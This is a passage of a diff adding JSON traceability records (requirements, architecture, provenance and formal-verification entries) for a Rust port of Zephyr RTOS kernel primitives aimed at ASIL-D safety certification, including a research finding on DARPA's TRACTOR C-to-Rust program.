+      "description": "The Zephyr RTOS shall provide a message queue that transfers fixed-size messages between threads via a ring buffer.\n",
+      "id": "ZEP-SRS-MQ-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MQ",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MQ-MQ02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "msgq"
+      ],
+      "title": "Zephyr: Message Queue Fixed-Size Messages",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The queue item count is always non-negative. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-QU-QU01",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-QU-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "QU1: 0 <= count (non-negative count)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a heap allocator supporting k_heap_alloc for variable-size allocation with optional blocking wait when memory is unavailable.\n",
+      "id": "ZEP-SRS-KH-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-KH",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "kheap"
+      ],
+      "title": "Zephyr: Dynamic Heap Allocation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Only partitions with size > 0 are considered active. Zero-size slots are treated as free.\n",
+      "id": "SWREQ-MD-MD02",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "alignment",
+        "asil-d"
+      ],
+      "title": "MD2: partition alignment constraints satisfied (size > 0)",
+      "type": "sw-req"
+    },
+    {
+      "description": "DARPA's TRACTOR program (TRanslating All C TO Rust, $14M, 7 performer teams) develops automated methods to translate legacy C codebases into safe, idiomatic Rust with correctness guarantees. Key techniques:\n1. **Verified Lifting** (ForCLift team, $5M — UW-Madison, UC Berkeley,\n   UIUC, Edinburgh): combines formal methods, program analysis, and LLMs\n   to produce verified C-to-Rust translations. Builds formal semantic\n   models of both C and Rust with certification tools.\n\n2. **Translation Validation** (VERT): uses WASM as oracle — compiles C\n   to WASM, uses LLM to generate idiomatic Rust candidate, then verifies\n   equivalence via property-based testing and Kani bounded model checking.\n   Improved correctness from 31% to 54% (PBT) and 1% to 42% (BMC).\n\n3. **Evaluation**: MIT Lincoln Lab runs benchmarks every 6 months.\n   Battery 01 tests pointer lifetimes, pass-by-reference → borrow model.\n   Public test corpus on GitHub (DARPA-TRACTOR-Program/PUBLIC-Test-Corpus).\n\nRelevance to Gale: our manual rewriting approach produces higher-quality verified code, but TRACTOR techniques could help us: - Validate that our Rust preserves C semantics (translation validation) - Automate the plain/ mirror generation from Verus code - Apply VERT-style bounded model checking as additional confidence layer - Use ForCLift's formal semantic models as reference for our C ↔ Rust\n  semantic equivalence arguments in ISO 26262 audits\n",
+      "id": "FIND-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "informs"
+        },
+        {
+          "target": "STKH-002",
+          "type": "informs"
+        },
+        {
+          "target": "REQ-TRACTOR-001",
+          "type": "generates"
+        },
+        {
+          "target": "REQ-TRACTOR-002",
+          "type": "generates"
+        },
+        {
+          "target": "REQ-TRACTOR-003",
+          "type": "generates"
+        }
+      ],
+      "status": "active",
+      "tags": [
+        "research",
+        "c2rust",
+        "darpa",
+        "tractor",
+        "verification"
+      ],
+      "title": "DARPA TRACTOR: Automated C-to-Rust translation with verification",
+      "type": "finding"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all pipe code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-PP-003",
+      "links": [
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Pipe Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Validate partition (size > 0, no overflow, no overlap with existing). Find free slot, place partition, increment count. C source: kernel/mem_domain.c lines 208-259.\n",
+      "id": "SWDD-MD-ADD",
+      "links": [
+        {
+          "target": "SWARCH-MD-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MD-MD01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MD-MD05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MD-MD06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MD-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "add"
+      ],
+      "title": "MemDomain::add_partition — k_mem_domain_add_partition port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "When signal is called and the wait queue is empty, the condvar state is unchanged. Maps to condvar.c:44-61.\n",
+      "id": "SWREQ-CV-C03",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "signal",
+        "asil-d"
+      ],
+      "title": "C3: signal on empty condvar is a no-op",
+      "type": "sw-req"
+    },
+    {
+      "description": "A LIFO queue that matches the Zephyr k_lifo API semantics: initialization, put (push to head), and get (pop from head). Built on top of k_queue. Must maintain item count bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-LI-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-LI",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "kernel"
+      ],
+      "title": "LIFO queue with put/get semantics",
+      "type": "system-req"
+    },
+    {
+      "description": "On successful get, the head index advances by one with wrap-around at capacity.\n",
+      "id": "SWREQ-RB-RB04",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "get",
+        "asil-d"
+      ],
+      "title": "RB4: get advances head = (head + 1) % capacity",
+      "type": "sw-req"
+    },
+    {
+      "description": "An SMP CPU lifecycle model that matches Zephyr's smp.c semantics: init, start_cpu, stop_cpu, resume_cpu, global lock/unlock. Must maintain CPU count bounds and lock consistency.\n",
+      "id": "SYSREQ-SM-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-SM",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "kernel"
+      ],
+      "title": "SMP CPU state tracking model",
+      "type": "system-req"
+    },
+    {
+      "description": "On success, read_check returns n > 0 where n <= request_len and n <= used bytes.  used is decremented by n. Maps to pipe.c:220-271.\n",
+      "id": "SWREQ-PP-PP06",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "read",
+        "asil-d"
+      ],
+      "title": "PP6: read_check computes correct byte count (min of request and used)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS stack shall enforce a bounded capacity, rejecting push operations when the stack is full.\n",
+      "id": "ZEP-SRS-SK-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-SK-SK03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-SK-SK04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "stack"
+      ],
+      "title": "Zephyr: Stack Bounded Capacity",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement time-slice enforcement for preemptive round-robin scheduling among equal-priority threads.\n",
+      "id": "ZEP-SYRS-TS",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeslice"
+      ],
+      "title": "Zephyr: Timeslice Subsystem",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall manage CPU lifecycle transitions (init, start, stop, resume) while maintaining the invariant that the number of active CPUs is bounded by [1, max_cpus].\n",
+      "id": "ZEP-SRS-SM-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SM",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "smp"
+      ],
+      "title": "Zephyr: SMP CPU Lifecycle",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide k_thread_create to initialize a thread with a stack, entry point, priority, and options, supporting both immediate and delayed start.\n",
+      "id": "ZEP-SRS-TL-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TL",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "thread"
+      ],
+      "title": "Zephyr: Thread Create and Start",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "LIFO queue item counter model. Tracks item count for put/get validation. Thin wrapper around queue — enqueues at head, dequeues from head (stack semantics). Actual data storage stays in C — Gale verifies counter safety only. No unsafe code.\n",
+      "id": "SWARCH-LI-001",
+      "links": [
+        {
+          "target": "SWREQ-LI-LI01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-LI-LI02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-LI-LI03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "architecture"
+      ],
+      "title": "LIFO module (gale::lifo)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When set is called with a bitmask, the event's current value is replaced entirely with the given bitmask.\n",
+      "id": "SWREQ-EV-EV02",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "set",
+        "asil-d"
+      ],
+      "title": "EV2: set replaces",
+      "type": "sw-req"
+    },
+    {
+      "description": "Recursive mutex with init/try_lock/lock_blocking/unlock. Owns a WaitQueue for blocked threads, an Option<ThreadId> owner, and u32 lock_count. Supports reentrant locking and priority-ordered ownership transfer. No unsafe code.\n",
+      "id": "SWARCH-MUT-001",
+      "links": [
+        {
+          "target": "SWREQ-MUT-M01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MUT-M03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MUT-M05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MUT-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "architecture"
+      ],
+      "title": "Mutex module (gale::mutex)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Atomic value model with get/set/add/sub/or/and/xor/nand/cas/ test_and_set/clear/inc/dec. Models wrapping u32 arithmetic. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-AT-001",
+      "links": [
+        {
+          "target": "SWREQ-AT-AT01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-AT-AT03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-AT-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "architecture"
+      ],
+      "title": "Atomic module (gale::atomic)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When get is called and count > 0, count decrements by 1 and returns OK. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-LI-LI03",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-LI-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "get",
+        "asil-d"
+      ],
+      "title": "LI3: get when not empty decrements count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "If active < max: active++, OK. If all active: EBUSY. C source: kernel/smp.c lines 170-194.\n",
+      "id": "SWDD-SM-START",
+      "links": [
+        {
+          "target": "SWARCH-SM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SM-SM02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "start"
+      ],
+      "title": "SmpState::start_cpu — k_smp_cpu_start port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus specifications in src/pipe.rs with requires/ensures clauses that formally verify all pipe properties (PP01-PP10) via SMT solving. Proves state machine correctness, byte count safety, and invariant preservation. Includes proof lemmas for invariant induction, write-read roundtrip, conservation, reset empties, and close clears flags. Executed via: bazel test //:verus_test\n",
+      "id": "FV-PP-001",
+      "links": [
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Pipe Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Zephyr kernel object metadata tests executed on qemu_cortex_m3. Validates that kernel object naming, stack info, and metadata APIs operate correctly with Gale implementations. Test suite: zephyr/tests/kernel/obj_tracking.\n",
+      "id": "SV-MD-001",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Metadata Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "CI workflow .github/workflows/binary-size.yml compares FLASH/RAM usage between Gale-enabled and Zephyr-only builds on qemu_cortex_m3. Fails if FLASH increases by more than 10% (SYSREQ-PERF-001). Stack analysis script confirms no FFI function exceeds 256 bytes of stack allocation (SYSREQ-PERF-002). no_std attribute in Cargo.toml with Miri confirming zero heap allocations (SYSREQ-PERF-003).\n",
+      "id": "SV-PERF-001",
+      "links": [
+        {
+          "target": "SYSREQ-PERF-001",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-PERF-002",
+          "type": "verifies"
+        },
+        {
+          "target": "SYSREQ-PERF-003",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "performance",
+        "ci",
+        "sys-5"
+      ],
+      "title": "Binary size and performance CI checks",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism to submit work items for deferred execution in a dedicated work queue thread context.\n",
+      "id": "ZEP-SRS-WK-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-WK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "work"
+      ],
+      "title": "Zephyr: Deferred Execution via Work Items",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of mutex init, lock/unlock paths (unlocked, reentrant, contended, not-owner, not-locked, final), lock-unlock roundtrip, reentrant unwind, and invariant preservation within bounded state space.\n",
+      "id": "UV-MUT-003",
+      "links": [
+        {
+          "target": "SWDD-MUT-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK-BLOCKING",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-UNLOCK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "Mutex Kani bounded model checking",
+      "type": "unit-verification"
+    },
+    {
+      "description": "If expired and eligible: invoke per-thread handler if set, move current to end of prio queue, reset slice. Returns whether rotation occurred. C source: kernel/timeslicing.c lines 131-161.\n",
+      "id": "SWDD-TS-ON-TICK",
+      "links": [
+        {
+          "target": "SWARCH-TS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TS-TS04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TS-TS05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "expiry",
+        "rotation"
+      ],
+      "title": "Timeslice::on_tick — z_time_slice port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Full Zephyr kernel condvar test suite executed on qemu_cortex_m3. CondVar has no Gale FFI layer (pure wait queue wrapper), so this validates that the upstream condvar.c continues to work correctly with the Gale wait queue replacement. Test suite: zephyr/tests/kernel/condvar.\n",
+      "id": "SV-CV-001",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "CondVar Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's sys_heap allocator. Contains sys_heap_init, sys_heap_alloc, sys_heap_free, sys_heap_aligned_alloc, split_chunks, merge_chunks, free_chunk (coalesce), sys_heap_realloc. The Gale port models chunk-level allocation invariants only — actual free-list traversal stays in C.\n",
+      "id": "PROV-HP-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "heap",
+        "lib"
+      ],
+      "title": "Zephyr lib/heap/heap.c — sys_heap chunk allocator",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The Zephyr RTOS futex wake shall wake up to N waiting threads from the futex wait queue, where N is specified by the caller or all waiters when wake_all is requested.\n",
+      "id": "ZEP-SRS-FX-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FX",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-FX-FX03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-FX-FX04",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-FX-FX05",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "futex"
+      ],
+      "title": "Zephyr: Futex Wake Wakes Up To N Threads",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When a message queue is purged, the Zephyr RTOS shall discard all enqueued messages and wake all threads waiting to put, returning a resource contention error code.\n",
+      "id": "ZEP-SRS-MQ-4",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MQ",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ10",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MQ-MQ11",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "msgq"
+      ],
+      "title": "Zephyr: Message Queue Purge Wakes All Waiters",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "No arithmetic operation on count or capacity causes integer overflow.  All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-SK-SK08",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "SK8: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's time-slicing subsystem. Contains slice_time, z_time_slice_size, slice_timeout, z_reset_time_slice, k_sched_time_slice_set, k_thread_time_slice_set, z_time_slice.  The Gale port models the eligibility logic, slice duration selection, and expiry-triggered rotation only — actual timeout management and spinlocks stay in C.\n",
+      "id": "PROV-TS-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "timeslice",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/timeslicing.c — time-slice subsystem implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "When set_masked is called with a value and a mask, only the bits selected by the mask are updated to the corresponding bits from the value; unmasked bits are preserved.\n",
+      "id": "SWREQ-EV-EV04",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "set-masked",
+        "asil-d"
+      ],
+      "title": "EV4: set_masked selective",
+      "type": "sw-req"
+    },
+    {
+      "description": "When the timer period is zero, the timer operates in one-shot mode and does not auto-restart after expiration.\n",
+      "id": "SWREQ-TM-TM06",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "one-shot",
+        "asil-d"
+      ],
+      "title": "TM6: period==0 means one-shot",
+      "type": "sw-req"
+    },
+    {
+      "description": "When take is called and count > 0, count decrements by 1 and returns 0 (OK). Maps to z_impl_k_sem_take lines 143-148 in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P05",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-6",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-7",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "take",
+        "asil-d"
+      ],
+      "title": "P5: take when count > 0 decrements by exactly 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Reset clears count to 0 and wakes every waiting thread with return value -EAGAIN.  Returns the number of threads woken. Maps to z_impl_k_sem_reset lines 166-192 in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P08",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-16",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-17",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "reset",
+        "asil-d"
+      ],
+      "title": "P8: reset sets count to 0, wakes all waiters with -EAGAIN",
+      "type": "sw-req"
+    },
+    {
+      "description": "When free is called and num_used > 0, num_used decrements by 1 and returns OK.\n",
+      "id": "SWREQ-MS-MS06",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "free",
+        "asil-d"
+      ],
+      "title": "MS6: free decrements num_used by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Atomic add returns the previous value and stores the sum using wrapping u32 arithmetic.\n",
+      "id": "SWREQ-AT-AT01",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "add",
+        "asil-d"
+      ],
+      "title": "AT1: add returns old value, stores old + val (wrapping)",
+      "type": "sw-req"
+    },
+    {
+      "description": "When attempting to acquire a semaphore, where the semaphore is not acquired within the specified time, the Zephyr RTOS shall return an error indicating a timeout.\n",
+      "id": "ZEP-SRS-5-10",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisition timeout error handling",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Hardware resources required by kernel primitives (spinlocks, interrupt control, MPU configuration) are exposed through the WASM component model as capabilities.  A kernel object can only access hardware it has been explicitly granted.  This prevents kernel components from accessing hardware outside their scope and enables compositional security analysis.\n",
+      "id": "SWREQ-KILN-005",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "capabilities",
+        "hardware",
+        "security"
+      ],
+      "title": "Capability-based hardware access for kernel primitives",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS futex wait shall block the calling thread if the atomic value at the futex address equals the expected value provided by the caller.\n",
+      "id": "ZEP-SRS-FX-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FX",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-FX-FX01",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "futex"
+      ],
+      "title": "Zephyr: Futex Wait Blocks On Value Match",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The number of active partitions never exceeds the maximum (CONFIG_MAX_DOMAIN_PARTITIONS = 16).\n",
+      "id": "SWREQ-MD-MD04",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "bounds",
+        "asil-d"
+      ],
+      "title": "MD4: num_partitions <= MAX_PARTITIONS",
+      "type": "sw-req"
+    },
+    {
+      "description": "When unlock is called by the owner and lock_count > 1, the count is decremented and the owner remains the same (reentrant release). Maps to z_impl_k_mutex_unlock lines 266-269 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M07",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "unlock",
+        "reentrant",
+        "asil-d"
+      ],
+      "title": "M7: unlock when lock_count > 1 decrements count, owner unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "The system shall implement a message queue synchronization primitive for transferring fixed-size data items between threads.\n",
+      "id": "ZEP-SYRS-MQ",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "msgq"
+      ],
+      "title": "Zephyr: Message Queue",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a LIFO queue that wraps k_queue, pushing items to the head and popping from the head in last-in first-out order.\n",
+      "id": "ZEP-SRS-LI-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-LI",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-LI-LI01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-LI-LI02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "lifo"
+      ],
+      "title": "Zephyr: LIFO Queue Wrapper",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a memory pool that tracks allocated and free block counts, ensuring the conservation invariant (allocated + free == capacity) holds at all times.\n",
+      "id": "ZEP-SRS-MP-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MP",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mempool"
+      ],
+      "title": "Zephyr: Memory Pool Management",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall allow threads to block on an event with a configurable timeout, returning an error code if the requested events are not received within the specified time.\n",
+      "id": "ZEP-SRS-EV-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-EV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "event"
+      ],
+      "title": "Zephyr: Event Blocking Wait with Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's userspace subsystem. Contains k_object_validate, k_thread_perms_set/clear, thread_perms_test, k_object_init/uninit, k_object_recycle, k_object_access_all_grant. The Gale port models the permission bitmask and object type validation only — gperf lookup, dynamic allocation, and memory copy helpers stay in C.\n",
+      "id": "PROV-US-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "userspace",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/userspace.c — kernel object permissions",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Permission operations reject invalid thread IDs (>= MAX_THREADS) with EINVAL.\n",
+      "id": "SWREQ-US-US08",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "validation",
+        "asil-d"
+      ],
+      "title": "US8: thread ID must be valid (< MAX_THREADS)",
+      "type": "sw-req"
+    },
+    {
